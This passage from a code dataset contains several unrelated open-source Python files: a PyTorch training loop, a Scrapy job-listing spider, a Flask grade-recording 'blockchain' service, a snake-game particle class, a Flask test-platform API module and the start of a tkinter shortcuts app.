pred.view(1, -1)\n target = target.view(1, -1)\n correct = pred.eq(target)\n\n correct = correct.view(-1)\n score = correct.float().sum(0).mul(100.0 / correct.size(0))\n return score.item()\n\ndef validate(model, val_loader, criterion, eval_score):\n args = parse_args()\n print_freq = args.freq\n losses = AverageMeter()\n score = AverageMeter()\n\n model.eval()\n for i, (input, target) in enumerate(val_loader):\n input = input.cuda().float()\n target = target.cuda().long()\n with torch.no_grad():\n output = model(input)\n loss = criterion(output, target)\n \n losses.update(loss.item(), input.size(0))\n score.update(eval_score(output, target), input.size(0))\n \n print('Loss {loss.val:.4f} ({loss.avg:.4f})\\t'\n 'Score {top1.val:.3f} ({top1.avg:.3f})'.format(loss=losses, top1=score), flush=True)\n \n return score.avg\n\n\ndef train(model, train_loader, val_loader, optimizer, criterion, writer, epoch, eval_score):\n args = parse_args() \n checkpoint_dir = args.cp_dir\n print_freq = args.freq\n for k, v in args.__dict__.items():\n print(k, ':', v)\n \n criterion.cuda()\n best_prec1 = 0\n start_epoch = 0\n global_step = 0\n \n for epoch in range(start_epoch, args.epochs):\n losses = AverageMeter()\n scores = AverageMeter()\n model.train()\n for i, (input, target) in enumerate(train_loader):\n optimizer.zero_grad()\n input = input.cuda().float()\n target = target.cuda().long()\n output = model(input)\n loss = criterion(output, target)\n\n writer.add_scalar('Loss/train', loss.item(), global_step)\n losses.update(loss.item(), input.size(0))\n scores.update(eval_score(output, target), input.size(0))\n writer.add_scalar('accuracy/train', scores.avg, global_step)\n\n loss.backward()\n optimizer.step() \n global_step += 1\n\n \n print('Epoch: [{0}]\\t'\n 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t'\n 'Score {top1.val:.3f} ({top1.avg:.3f})'.format(\n epoch, loss=losses, top1=scores))\n\n prec1 = validate(model, val_loader, criterion, eval_score)\n is_best = prec1 > best_prec1\n best_prec1 = max(prec1, best_prec1)\n writer.add_scalar('accuracy/val', prec1, epoch+1)\n\n checkpoint_path = join(checkpoint_dir,'checkpoint_{}.pth.tar'.format(epoch))\n cp_state = {\n 'epoch': epoch + 1,\n 'state_dict': model.state_dict(),\n 'prec1': prec1,\n }\n torch.save(cp_state, checkpoint_path)\n if is_best:\n torch.save(cp_state, join(checkpoint_dir, 'best_checkpoint.pth.tar'))\n\n writer.close()\n\nif __name__=='__main__':\n args = parse_args()\n train_loader = DataLoader(train_set, batch_size=args.batch_size, shuffle=False, num_workers=args.workers, \n 
sampler=train_sampler, pin_memory=True)\n val_loader = DataLoader(val_set, batch_size=args.batch_size, shuffle=False, num_workers=args.workers, \n sampler=val_sampler, pin_memory=True)\n writer = SummaryWriter(comment= args.log)\n criterion = nn.CrossEntropyLoss()\n mkdir(args.cp_dir)\n\n # model = Class_Net()\n model = Class_Net()\n\n model = torch.nn.DataParallel(model).cuda()\n\n optimizer = optim.SGD(model.parameters(), lr=args.lr, momentum=args.momentum, weight_decay=args.weight_decay)\n train(model, train_loader, val_loader, optimizer, criterion, writer, args.epochs, accuracy) \n\n \n\n\n","repo_name":"xd-liu/Image-Manipulation","sub_path":"p4/part1_classify/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74441533288","text":"# -*- coding: utf-8 -*-\nimport scrapy\n\n\nclass NaukriSpider(scrapy.Spider):\n # url = \"https://www.naukri.com/data-analyst-jobs-in-ncr\"\n name = 'naukri'\n subUrl = \"data-analyst-jobs-in-ncr/\"\n allowed_domains = ['naukri.com']\n start_urls = [\"https://www.naukri.com/data-analyst-jobs-in-ncr/\"]\n\n def parse(self, response):\n for job in response.xpath(\"//div[@type='tuple']\"):\n item = {\n \"title\": job.xpath(\"a/ul/li[@class='desig']/@title\").extract_first(),\n \"url\": job.xpath(\"a/@href\").extract_first(),\n\n \"company\": job.xpath(\"a/span/span[@class='org']/text()\").extract_first(),\n \"ratings\": job.xpath(\"a/span/span[@class='rating']/text()\").extract_first(),\n\n \"reviews\": job.xpath(\"a/span/span[@class='rating']\\\n /span[@class='review']/text()\").extract_first(),\n\n\n \"expierence\": job.xpath(\"a/span[@class='exp']/text()\").extract_first(),\n \"location\": job.xpath(\"a/span[@class='loc']/span/text()\").extract_first(),\n \"keyskills\": job.xpath(\"a/div[@class='more']/div[@class='desc']\\\n /span[@class='skill']/text()\").extract_first(),\n\n \"desc\": job.xpath(\"a/div[@class='more']\\\n /span[@class='desc']/text()\").extract_first(),\n\n \"salary\": job.xpath(\"div[@class='other_details']//\\\n span[@class='salary ']/text()\").extract_first(),\n\n \"posted_by\": job.xpath(\"div[@class='other_details']/\\\n div[@class='rec_details']/a[@class='rec_name']/text()\").extract_first(),\n\n \"posted_on\": job.xpath(\"div[@class='other_details']/\\\n div[@class='rec_details']/span[@class='date']/text()\").extract_first(),\n }\n yield item\n\n next_page_url = response.xpath(\"//div[@class='pagination']/a/@href\").extract()[-1]\n if next_page_url:\n request = scrapy.Request(url=next_page_url)\n yield request\n\n\n\n","repo_name":"jai-singhal/data_science","sub_path":"scrapping/naukri.py","file_name":"naukri.py","file_ext":"py","file_size_in_byte":2107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19164839136","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Apr 12 10:45:42 2020\r\n\r\n@author: OPEN NOW\r\n\"\"\"\r\n\r\nfrom flask import Flask, request, jsonify,render_template\r\nfrom werkzeug import secure_filename\r\nimport csv\r\nfrom hashlib import sha256\r\nfrom time import time\r\nimport json\r\nimport os.path\r\n\r\n\r\nclass blockchain(object):\r\n def __init__(self,student_id):\r\n self.chain=[]\r\n self.student_id = student_id\r\n \r\n # sha256 hash\r\n def data_hash(self,data):\r\n return sha256(str(data).encode('utf8')).hexdigest()\r\n \r\n # last block \r\n def _lastBlock(self):\r\n\r\n data = {\r\n 'stid': 
None,\r\n 'code': None,\r\n 'grade': None,\r\n 'time':None,\r\n 'year':None,\r\n 'seme':None,\r\n 'creater':None,\r\n }\r\n\r\n header = {\r\n 'index':len(self.chain)+1,\r\n 'timestamp':time(),\r\n 'prev_hash':self.data_hash(self.chain[-1]),\r\n 'hashData': self.data_hash(data),\r\n }\r\n \r\n block = {'header':header,'data': data} \r\n self.chain.append(block)\r\n \r\n # create the genesis block, then append an empty tail block\r\n def generic_block(self):\r\n\r\n data = {\r\n 'stid': self.student_id,\r\n 'code': None,\r\n 'grade': None,\r\n 'time':time(),\r\n 'year':None,\r\n 'seme':None,\r\n 'creater':None,\r\n }\r\n \r\n header = {\r\n 'index':1,\r\n 'timestamp':time(),\r\n 'prev_hash':None,\r\n 'hashData': self.data_hash(data),\r\n }\r\n\r\n block = {'header':header,'data': data} \r\n self.chain.append(block)\r\n self._lastBlock() \r\n \r\n def verify(self):\r\n currentB=self.chain[-1] \r\n valid=True\r\n index = len(self.chain)-1\r\n \r\n while (index > 0 and valid == True):\r\n \r\n prev_B=self.chain[index-1]\r\n \r\n if(currentB['header']['prev_hash']==self.data_hash(prev_B)):\r\n currentB = prev_B\r\n valid = True\r\n index -= 1\r\n \r\n else:\r\n valid=False\r\n index -= 1\r\n \r\n return valid\r\n \r\n def load_data(self):\r\n \r\n filename = str(self.student_id + \".json\")\r\n print (filename)\r\n \r\n if os.path.exists(filename) == True:\r\n \r\n # load json to self.chain\r\n with open(filename, \"r\") as f:\r\n reader = json.load(f)\r\n for row in reader:\r\n self.chain.append(row)\r\n \r\n return True\r\n else:\r\n print(\"No saved data\")\r\n return False\r\n \r\n def save_data(self):\r\n \r\n filename = str(self.student_id + \".json\")\r\n \r\n try:\r\n with open(filename,'w') as f:\r\n json.dump(self.chain,f)\r\n return True\r\n\r\n except IOError:\r\n return False\r\n\r\n def input_data(self,stdid,code,grade,year,seme,creator):\r\n \r\n #print(self.chain[-1]['header']['prev_hash'])\r\n\r\n tmpBlock = self.chain[-1]\r\n \r\n tmpBlock['data']['stid'] = stdid\r\n tmpBlock['data']['code'] = code\r\n tmpBlock['data']['grade'] = grade\r\n tmpBlock['data']['time'] = time()\r\n tmpBlock['data']['year'] = year\r\n tmpBlock['data']['seme'] = seme\r\n tmpBlock['data']['creater'] = creator\r\n \r\n tmpBlock['header']['index'] = len(self.chain)\r\n tmpBlock['header']['timestamp'] = time()\r\n tmpBlock['header']['hashData'] = self.data_hash(tmpBlock['data'])\r\n \r\n self._lastBlock() \r\n \r\n\"\"\"\r\nstart flask\r\n\"\"\"\r\napp = Flask(__name__)\r\n\r\n\"\"\"\r\nsave grade \r\n\"\"\"\r\n@app.route('/add', methods=['POST'])\r\ndef adding():\r\n\r\n data = request.get_json()\r\n \r\n bc = blockchain(data[\"stdid\"])\r\n\r\n # check existing \r\n if bc.load_data() == True:\r\n bc.input_data(data[\"stdid\"],data[\"code\"],data[\"grade\"],data[\"year\"],data[\"seme\"],data[\"creator\"])\r\n if bc.save_data() == True:\r\n res_code = 1\r\n else:\r\n res_code = 0\r\n else:\r\n bc.generic_block()\r\n bc.input_data(data[\"stdid\"],data[\"code\"],data[\"grade\"],data[\"year\"],data[\"seme\"],data[\"creator\"])\r\n if bc.save_data() == True:\r\n res_code = 1\r\n else:\r\n res_code = 0\r\n \r\n response = {\r\n \r\n \"res_code\": res_code\r\n \r\n }\r\n return jsonify(response), 200\r\n\"\"\"\r\nVerify grade \r\n\"\"\"\r\n@app.route('/cp', methods=['POST'])\r\ndef compareG():\r\n \r\n req_data = request.get_json()\r\n \r\n stid = req_data['stdid']\r\n grade = req_data['grade']\r\n code = req_data['code']\r\n year = req_data['year']\r\n seme = req_data['seme']\r\n 
print(stid,grade,code,year,seme)\r\n \r\n \r\n bc = blockchain(stid)\r\n\r\n \r\n if bc.load_data ()==True:\r\n response = {'res_code':\"load data\"}\r\n if bc.verify ()==True:\r\n response = {'res_code':\"verify\"}\r\n vf=True\r\n \r\n # Skip the last block; the index starts at 1 to match the len value\r\n i=len(bc.chain)-1\r\n for block in bc.chain:\r\n block=bc.chain[i]\r\n i=i-1\r\n if vf==True:\r\n if block['data']['stid']==stid:\r\n if block['data']['code']==code:\r\n if block['data']['year']==year:\r\n if block['data']['seme']==seme:\r\n if block['data']['grade']==grade:\r\n response = {'res_code':1,'valid':True}\r\n vf=False\r\n print (response)\r\n return jsonify(response)\r\n elif block['data']['grade']!=grade:\r\n response = {'res_code':0,'valid':\"false\"}\r\n vf=False\r\n print (response)\r\n return jsonify(response)\r\n break\r\n if block['header']['index']==1: \r\n response = {'res_code':101,'valid':\"Don't have data\"}\r\n print (response)\r\n return jsonify(response) \r\n \r\n elif bc.verify ()!=True: \r\n response = {'res_code':102,'valid':\"Data in blockchain Not good!\"}\r\n print (response)\r\n return jsonify(response) \r\n \r\n elif bc.load_data ()!=True: \r\n response = {'res_code':101,'valid':\"Don't have data\"}\r\n print (response)\r\n return jsonify(response) \r\n\"\"\"\r\nshow grade \r\n\"\"\"\r\n@app.route('/<uid>', methods=['GET'])\r\ndef show(uid):\r\n bc = blockchain(uid)\r\n bc.load_data()\r\n \r\n response = {\r\n 'chain': bc.chain\r\n }\r\n\r\n return jsonify(response), 200 \r\n\r\nif __name__ == '__main__':\r\n app.run(host='0.0.0.0', port=2000)","repo_name":"Supadtra/5920310035","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"22177474942","text":"\"\"\"\r\n\r\nThis module simulates the snake game - you can move its head to eat the food and grow.\r\n\r\n@author Seongrim Choi (sc83)\r\n@date: Fall, 2021\r\n\"\"\"\r\nfrom random import randint\r\n\r\nclass Particle:\r\n def __init__(self, x=0, y=0, radius=10, color=\"yellow\"):\r\n \"\"\"Instantiate a particle object.\"\"\"\r\n # Randomizes the location of the food appearing.\r\n if x == 0:\r\n x = randint(20, 730)\r\n if y == 0:\r\n y = randint(20, 530)\r\n self.x = x\r\n self.y = y\r\n self.radius = radius\r\n self.color = color\r\n\r\n def draw(self, drawing):\r\n \"\"\" Draw the particle as an oval. 
\"\"\"\r\n drawing.oval(self.x - self.radius,\r\n self.y - self.radius,\r\n self.x + self.radius,\r\n self.y + self.radius,\r\n color=self.color\r\n )","repo_name":"wcsrchoi/cs108-Final-Project","sub_path":"Final Project (Snake Game)/Particle.py","file_name":"Particle.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11873144845","text":"# -*- coding:utf-8 -*-\n\nimport json\n\nfrom datetime import datetime, timedelta\nfrom flask import Blueprint, request\nfrom flask_restful import Resource\n\nfrom atp.api.comm_log import logger\nfrom atp.api.mysql_manager import (ApiCompanyInfoManager, ApiSystemInfoManager, ApiProductLineManager,\n ApiTestcaseMainManager, ApiTestcaseSubManager)\nfrom atp.api.redis_api import RedisManager\nfrom atp.engine.return_code_desc import CODE_DESC_MAP\nfrom atp.utils.common import get_request_json, make_response, db_result_to_map\nfrom atp.views.wrappers import timer, login_check, master_check, developer_check\n\nredis = RedisManager()\napi_company = Blueprint('api_company_interface', __name__)\n\nsubtree_filter_conditions = ['用例编号', '接口url', '接口中文名']\nmain_subtree_filter_conditions = ['用例编号', '接口url', '接口中文名']\n\n\nclass ApiCompany(Resource):\n def __init__(self):\n self.data = get_request_json()\n self.username = redis.get_username(request.headers.get('X-Token'))\n self.acim = ApiCompanyInfoManager()\n self.asim = ApiSystemInfoManager()\n self.all_sub_objs = None\n\n @timer\n def post(self, action):\n if action == 'add':\n return self.add_company()\n\n elif action == 'edit':\n return self.edit_company()\n\n elif action == 'delete':\n return self.delete_company()\n\n elif action == 'list':\n return self.company_list()\n\n elif action == 'subtree':\n return self.subtree()\n\n elif action == 'projectSubtree':\n return self.project_subtree()\n\n elif action == 'productLineSubtree':\n return self.product_line_subtree()\n\n elif action == 'intfCaseSubtree':\n return self.intf_case_subtree()\n\n elif action == 'getFilterConditions':\n return make_response({\"code\": \"000\", \"conditions\": subtree_filter_conditions})\n\n elif action == 'subtreeFilter':\n return self.api_subtree_filter()\n\n elif action == 'mainSubtreeFilter':\n return self.api_main_subtree_filter()\n\n else:\n return make_response({\"code\": \"100\", \"desc\": \"url错误,不存在的接口动作<{action}>\".format(action=action)})\n\n @master_check\n def add_company(self):\n try:\n company_name = self.data.pop('companyName')\n simple_desc = self.data.pop('simpleDesc', None)\n except KeyError:\n return make_response({\"code\": \"100\", \"desc\": \"入参校验失败\"})\n\n company_name = str(company_name).strip()\n\n # 判断公司名是否已存在,存在无法添加\n if self.acim.get_company(company_name=company_name):\n return make_response({\"code\": \"201\", \"desc\": \"公司名称\\\"{}\\\"已存在\".format(company_name)})\n\n self.acim.insert_company(company_name=company_name, simple_desc=simple_desc, creator=self.username)\n return make_response({\"code\": \"000\", \"desc\": \"公司\\\"{}\\\"增加成功\".format(company_name)})\n\n @master_check\n def edit_company(self):\n try:\n company_id = self.data.pop('companyId')\n company_name = self.data.pop('companyName')\n simple_desc = self.data.pop('simpleDesc', None)\n except KeyError:\n return make_response({\"code\": \"100\", \"desc\": \"入参校验失败\"})\n\n if not self.acim.get_company(id=company_id):\n return make_response({\"code\": \"202\", \"desc\": \"公司id\\\"{}\\\"不存在, 请刷新后重试\".format(company_id)})\n elif 
self.acim.get_company(company_name=company_name):\n return make_response({\"code\": \"201\", \"desc\": \"公司名称\\\"{}\\\"已存在, 无法修改\".format(company_name)})\n\n self.acim.update_company(company_id, company_name=company_name, simple_desc=simple_desc,\n last_modifier=self.username)\n return make_response({\"code\": \"000\", \"desc\": \"公司\\\"{}\\\"修改成功\".format(company_name)})\n\n @login_check\n def company_list(self):\n res_list = []\n objs = self.acim.get_companies()\n for obj in objs:\n res_list.append(\n {\n 'companyId': obj.id,\n 'companyName': obj.company_name,\n 'simpleDesc': obj.simple_desc,\n 'creator': obj.creator,\n 'last_modifier': obj.last_modifier\n }\n )\n return make_response({\"code\": \"000\", \"companyList\": res_list})\n\n @master_check\n def delete_company(self):\n try:\n company_id = self.data.pop('companyId')\n except KeyError:\n return make_response({\"code\": \"100\", \"desc\": \"入参校验失败\"})\n\n if not self.acim.get_company(id=company_id):\n return make_response({\"code\": \"202\", \"desc\": \"公司id\\\"{}\\\"不存在, 请刷新后重��\".format(company_id)})\n\n system_objs = self.asim.get_systems(api_company_id=company_id)\n if system_objs:\n return make_response({\"code\": \"300\", \"desc\": \"公司下已配置{}个工程,无法直接删除公司\".format(len(system_objs))})\n\n self.acim.delete_company(company_id)\n return make_response({\"code\": \"000\", \"desc\": \"公司删除成功\"})\n\n @login_check\n def subtree(self):\n \"\"\"根据公司id查询配置在该公司下的系统-接口\"\"\"\n try:\n company_id = self.data.pop('companyId')\n except KeyError:\n return make_response({\"code\": \"100\", \"desc\": \"入参校验失败\"})\n\n subtree = []\n index_id = 1\n\n result_list = self.acim.query_api_subtree(company_id)\n # logger.info('result_list:{}'.format(json.dumps(result_list)))\n\n system_id_exist_list = []\n intf_id_exist_list = []\n for row in result_list:\n if row[0] not in system_id_exist_list and row[2] is None:\n system_id_exist_list.append(row[0])\n subtree.append(\n {\n 'id': index_id,\n 'label': row[1],\n 'systemId': row[0],\n 'gitSshURL': row[4],\n 'children': []\n }\n )\n index_id += 1\n elif row[0] not in system_id_exist_list and row[2] not in intf_id_exist_list:\n system_id_exist_list.append(row[0])\n intf_id_exist_list.append(row[2])\n subtree.append(\n {\n 'id': index_id,\n 'label': row[1],\n 'systemId': row[0],\n 'gitSshURL': row[4],\n 'children': [\n {\n 'id': index_id + 1,\n 'label': row[3],\n 'intfId': row[2]\n }\n ]\n }\n )\n index_id += 2\n elif row[0] in system_id_exist_list and row[2] not in intf_id_exist_list:\n intf_id_exist_list.append(row[2])\n for system in subtree:\n if row[0] == system['systemId']:\n system['children'].append(\n {\n 'id': index_id,\n 'label': row[3],\n 'intfId': row[2]\n }\n )\n break\n index_id += 1\n\n return make_response({\"code\": \"000\", \"data\": subtree})\n\n @login_check\n def project_subtree(self):\n \"\"\"根据公司id查询配置在该公司下的项目-系统-接口-用例\"\"\"\n try:\n company_id = self.data.pop('companyId')\n recent_days = int(self.data.pop('recentDays', 0))\n except (KeyError, ValueError):\n return make_response({\"code\": \"100\", \"desc\": \"入参校验失败\"})\n\n if recent_days:\n today_date = datetime.date(datetime.now())\n start_day = today_date + timedelta(days=-int(recent_days))\n result_list = self.acim.query_api_project_subtree(company_id, start_day=start_day)\n else:\n result_list = self.acim.query_api_project_subtree(company_id)\n\n # logger.info('result_list:{}'.format(json.dumps(result_list)))\n patch_result_list = self.acim.query_api_project_subtree_patch(company_id)\n subtree = result_list_to_subtree(result_list, 
patch_result_list)\n\n return make_response({\"code\": \"000\", \"data\": subtree})\n\n @login_check\n def product_line_subtree_old(self):\n \"\"\"根据公司id查询配置在该公司下的产品线-全链路用例\"\"\"\n try:\n company_id = self.data.pop('companyId')\n except KeyError:\n return make_response({\"code\": \"100\", \"desc\": CODE_DESC_MAP[\"100\"]})\n\n subtree = []\n index_id = 0\n\n result_list = self.acim.query_api_product_line_subtree(company_id)\n logger.debug(result_list)\n\n result_dic = db_result_to_map(result_list)\n logger.debug(result_dic)\n for p_k, p_dic in result_dic.items():\n p_name = p_dic.pop('name')\n index_id += 1\n p_tree = {\n 'id': index_id,\n 'label': p_name,\n 'productLineId': p_k,\n 'children': []\n }\n for t_k, t_dic in p_dic.items():\n t_name = t_dic.pop('name')\n index_id += 1\n t_tree = {\n 'id': index_id,\n 'label': t_name,\n 'testcaseId': t_k,\n 'children': []\n }\n p_tree['children'].append(t_tree)\n subtree.append(p_tree)\n\n return make_response({\"code\": \"000\", \"data\": subtree})\n\n @login_check\n def product_line_subtree(self):\n \"\"\"根据公司id查询配置在该公司下的产品线-目录-目录-...-全链路用例\"\"\"\n try:\n company_id = self.data.pop('companyId')\n with_sub = self.data.pop('withSub', None)\n tag_id_list = self.data.pop('tagIdList', None)\n without_testcase = self.data.pop('withoutTestcase', None)\n except KeyError:\n return make_response({\"code\": \"100\", \"desc\": CODE_DESC_MAP[\"100\"]})\n\n if not (isinstance(tag_id_list, list) and len(tag_id_list) in [1, 2]):\n tag_id_list = None\n\n self.all_sub_objs = ApiTestcaseSubManager.get_testcase_subs()\n\n subtree = []\n index = 0\n\n pl_objs = ApiProductLineManager.get_product_lines(api_company_id=company_id)\n for pl_obj in pl_objs:\n index += 1\n top_tree = {\n 'id': index,\n 'label': pl_obj.product_line_name,\n 'productLineId': pl_obj.id,\n 'children': []\n }\n index = get_under_node(pl_obj.id, top_tree['children'], index, with_sub, tag_id_list, without_testcase,\n self.all_sub_objs)\n subtree.append(top_tree)\n\n if tag_id_list:\n # 过滤去除没有用例的节点\n remove_no_case_node(subtree)\n\n return make_response({\"code\": \"000\", \"data\": subtree})\n\n @login_check\n def intf_case_subtree(self):\n \"\"\"根据公司id查询配置在该公司下的工程-接口-用例\"\"\"\n try:\n company_id = self.data.pop('companyId')\n except KeyError:\n return make_response({\"code\": \"100\", \"desc\": CODE_DESC_MAP[\"100\"]})\n\n subtree = []\n index_id = 0\n\n result_list = self.acim.query_api_intf_case_subtree(company_id)\n\n result_dic = db_result_to_map(result_list)\n for s_k, s_dic in result_dic.items():\n p_name = s_dic.pop('name')\n index_id += 1\n s_tree = {\n 'id': index_id,\n 'label': p_name,\n 'value': s_k,\n 'children': []\n }\n for i_k, i_dic in s_dic.items():\n t_name = i_dic.pop('name')\n index_id += 1\n i_tree = {\n 'id': index_id,\n 'label': t_name,\n 'value': i_k\n }\n for t_k, t_dic in i_dic.items():\n t_name = t_dic.pop('name')\n index_id += 1\n t_tree = {\n 'id': index_id,\n 'label': t_name,\n 'value': t_k\n }\n if 'children' not in i_tree:\n i_tree['children'] = []\n i_tree['children'].append(t_tree)\n s_tree['children'].append(i_tree)\n subtree.append(s_tree)\n\n return make_response({\"code\": \"000\", \"data\": subtree})\n\n @login_check\n def api_subtree_filter(self):\n try:\n company_id = self.data.pop('companyId')\n filter_ = self.data.pop('filter')\n keyword = self.data.pop('keyword').strip()\n if not keyword:\n raise ValueError\n if filter_ not in subtree_filter_conditions:\n raise ValueError\n except (KeyError, ValueError):\n return make_response({\"code\": \"100\", 
\"desc\": CODE_DESC_MAP[\"100\"]})\n\n subtree = subtree_filter_by_keyword(company_id, filter_, keyword)\n\n return make_response({\"code\": \"000\", \"data\": subtree})\n\n @login_check\n def api_main_subtree_filter(self):\n try:\n company_id = self.data.pop('companyId')\n filter_ = self.data.pop('filter')\n keyword = self.data.pop('keyword').strip()\n if not keyword:\n raise ValueError\n if filter_ not in subtree_filter_conditions:\n raise ValueError\n except (KeyError, ValueError):\n return make_response({\"code\": \"100\", \"desc\": CODE_DESC_MAP[\"100\"]})\n\n subtree = main_subtree_filter_by_keyword(company_id, filter_, keyword)\n\n return make_response({\"code\": \"000\", \"data\": subtree})\n\n\ndef get_under_node(parent_id, tree_list, index, with_sub, tag_id_list, without_testcase, all_sub_objs):\n pl_objs = ApiProductLineManager.get_product_lines(parent_id=parent_id)\n for pl_obj in pl_objs:\n index += 1\n tree = {\n 'id': index,\n 'label': pl_obj.product_line_name,\n 'productLineId': pl_obj.id,\n 'children': []\n }\n index = get_under_node(pl_obj.id, tree['children'], index, with_sub, tag_id_list, without_testcase,\n all_sub_objs)\n tree_list.append(tree)\n\n if without_testcase:\n return index\n\n # tm_objs = ApiTestcaseMainManager.get_testcase_mains(api_product_line_id=parent_id)\n res = ApiTestcaseMainManager.get_testcase_mains_in_tag(api_product_line_id=parent_id, tag_id_list=tag_id_list)\n\n for row in res:\n index += 1\n tree = {\n 'id': index,\n 'label': str(row[0]) + '_' + row[1],\n 'testcaseId': row[0],\n 'children': []\n }\n # 是否需要添加到子用例层\n if with_sub:\n sub_list = json.loads(row[2])\n\n # sub_objs = ApiTestcaseSubManager.get_testcase_subs_in_id_list(sub_list)\n # for sub_obj in sub_objs:\n # sub_tree = {\n # 'id': index,\n # 'label': sub_obj.sub_name,\n # 'subId': sub_obj.id,\n # }\n # tree['children'].append(sub_tree)\n\n # for sub_id in sub_list:\n # sub_obj = ApiTestcaseSubManager.get_testcase_sub(id=sub_id)\n # sub_tree = {\n # 'id': index,\n # 'label': sub_obj.sub_name,\n # 'subId': sub_id,\n # 'children': []\n # }\n # tree['children'].append(sub_tree)\n\n for sub_id in sub_list:\n for sub_obj in all_sub_objs:\n if sub_id == sub_obj.id:\n sub_tree = {\n 'id': index,\n 'label': sub_obj.sub_name,\n 'subId': sub_obj.id,\n }\n tree['children'].append(sub_tree)\n break\n\n tree_list.append(tree)\n return index\n\n\ndef remove_no_case_node(subtree):\n delete_flag = False\n for i in range(len(subtree) - 1, -1, -1):\n if 'testcaseId' in subtree[i]:\n break\n if subtree[i]['children']:\n delete_flag = remove_no_case_node(subtree[i]['children'])\n else:\n delete_flag = True\n if delete_flag:\n subtree.pop(i)\n\n return delete_flag\n\n\ndef result_list_to_subtree(result_list, patch_result_list=None):\n subtree = []\n index_id = 1\n result_dic = db_result_to_map(result_list, patch_result_list)\n for p_k, p_dic in result_dic.items():\n p_name = p_dic.pop('name')\n index_id += 1\n p_tree = {\n 'id': index_id,\n 'label': p_name,\n 'projectId': p_k,\n 'children': []\n }\n for s_k, s_dic in p_dic.items():\n s_name = s_dic.pop('name')\n index_id += 1\n s_tree = {\n 'id': index_id,\n 'label': s_name,\n 'systemId': s_k,\n 'children': []\n }\n for i_k, i_dic in s_dic.items():\n i_name = i_dic.pop('name')\n index_id += 1\n i_tree = {\n 'id': index_id,\n 'label': i_name,\n 'intfId': i_k,\n 'children': []\n }\n for t_k, t_dic in i_dic.items():\n index_id += 1\n t_tree = {\n 'id': index_id,\n 'label': '{0}_{1}'.format(t_k, t_dic['name']),\n 'testcaseId': t_k,\n }\n 
i_tree['children'].append(t_tree)\n s_tree['children'].append(i_tree)\n p_tree['children'].append(s_tree)\n subtree.append(p_tree)\n return subtree\n\n\ndef subtree_filter_by_keyword(company_id, filter_, keyword):\n result_list = []\n if filter_ == '用例编号':\n result_list = ApiCompanyInfoManager.query_api_project_subtree_by_testcase_id(company_id, testcase_id=keyword)\n elif filter_ == 'testcaseName':\n result_list = ApiCompanyInfoManager.query_api_project_subtree_like_testcase_name(company_id,\n testcase_name=keyword)\n elif filter_ == 'testcaseCreator':\n result_list = ApiCompanyInfoManager.query_api_project_subtree_like_testcase_creator(company_id,\n testcase_creator=keyword)\n elif filter_ == '接口url':\n result_list = ApiCompanyInfoManager.query_api_project_subtree_like_intf_url(company_id, intf_url=keyword)\n elif filter_ == '接口中文名':\n result_list = ApiCompanyInfoManager.query_api_project_subtree_like_intf_desc(company_id, intf_desc=keyword)\n # print(len(result_list))\n if not result_list:\n result_list = subtree_filter_by_keyword_not_belong_project(company_id, filter_, keyword)\n return result_list_to_subtree(result_list)\n\n\ndef subtree_filter_by_keyword_not_belong_project(company_id, filter_, keyword):\n # Supplementary query for cases not attached to any project\n result_list = []\n if filter_ == '用例编号':\n result_list = ApiCompanyInfoManager.query_api_subtree_by_testcase_id(company_id, testcase_id=keyword)\n elif filter_ == '接口url':\n result_list = ApiCompanyInfoManager.query_api_subtree_like_intf_url(company_id, intf_url=keyword)\n elif filter_ == '接口中文名':\n result_list = ApiCompanyInfoManager.query_api_subtree_like_intf_desc(company_id, intf_desc=keyword)\n\n if result_list:\n # Prepend the placeholder project id and project name\n new_result_list = []\n for row in result_list:\n row = list(row)\n row.insert(0, -1)\n row.insert(1, '未归属到任何项目') # \"not assigned to any project\"\n new_result_list.append(row)\n result_list = new_result_list\n\n return result_list\n\n\ndef main_subtree_filter_by_keyword(company_id, filter_, keyword):\n result_list = []\n if filter_ == '用例编号':\n result_list = ApiCompanyInfoManager.query_api_project_subtree_by_testcase_id(company_id, testcase_id=keyword)\n elif filter_ == '接口url':\n result_list = ApiCompanyInfoManager.query_api_project_subtree_like_intf_url(company_id, intf_url=keyword)\n elif filter_ == '接口中文名':\n result_list = ApiCompanyInfoManager.query_api_project_subtree_like_intf_desc(company_id, intf_desc=keyword)\n\n print(len(result_list))\n return result_list_to_subtree(result_list)\n","repo_name":"ooqitech/ATP","sub_path":"atp-auto-core-open/atp/views/api_company.py","file_name":"api_company.py","file_ext":"py","file_size_in_byte":21310,"program_lang":"python","lang":"en","doc_type":"code","stars":152,"dataset":"github-code","pt":"53"}
+{"seq_id":"15361057976","text":"import tkinter\r\nfrom tkinter import messagebox\r\nimport webbrowser\r\n\r\nimport xlrd\r\n\r\nlocation = \"data\\shorts.xlsx\"\r\nwb = xlrd.open_workbook(location)\r\nsheet = wb.sheet_by_index(0)\r\nsheet.cell_value(0, 0)\r\n\r\n\r\nclass Keyshorts(tkinter.Tk):\r\n def __init__(self, parent):\r\n tkinter.Tk.__init__(self, parent)\r\n self.parent = parent\r\n # declare the widget attributes before building the UI,\r\n # so initialize() can assign the real widgets to them\r\n self.search_query = None\r\n self.search = None\r\n self.menubar = None\r\n self.drop = None\r\n self.searchbtn = None\r\n self.searchbox = None\r\n self.list = None\r\n self.scrollbar = None\r\n self.initialize()\r\n\r\n def initialize(self):\r\n def update():\r\n messagebox.showerror(\"No Update\", \"This is the alpha version\")\r\n\r\n def feedback():\r\n webbrowser.open('mailto:ristikmajumdar@protonmail.com?Subject=Feedback-To-KeyShorts', 
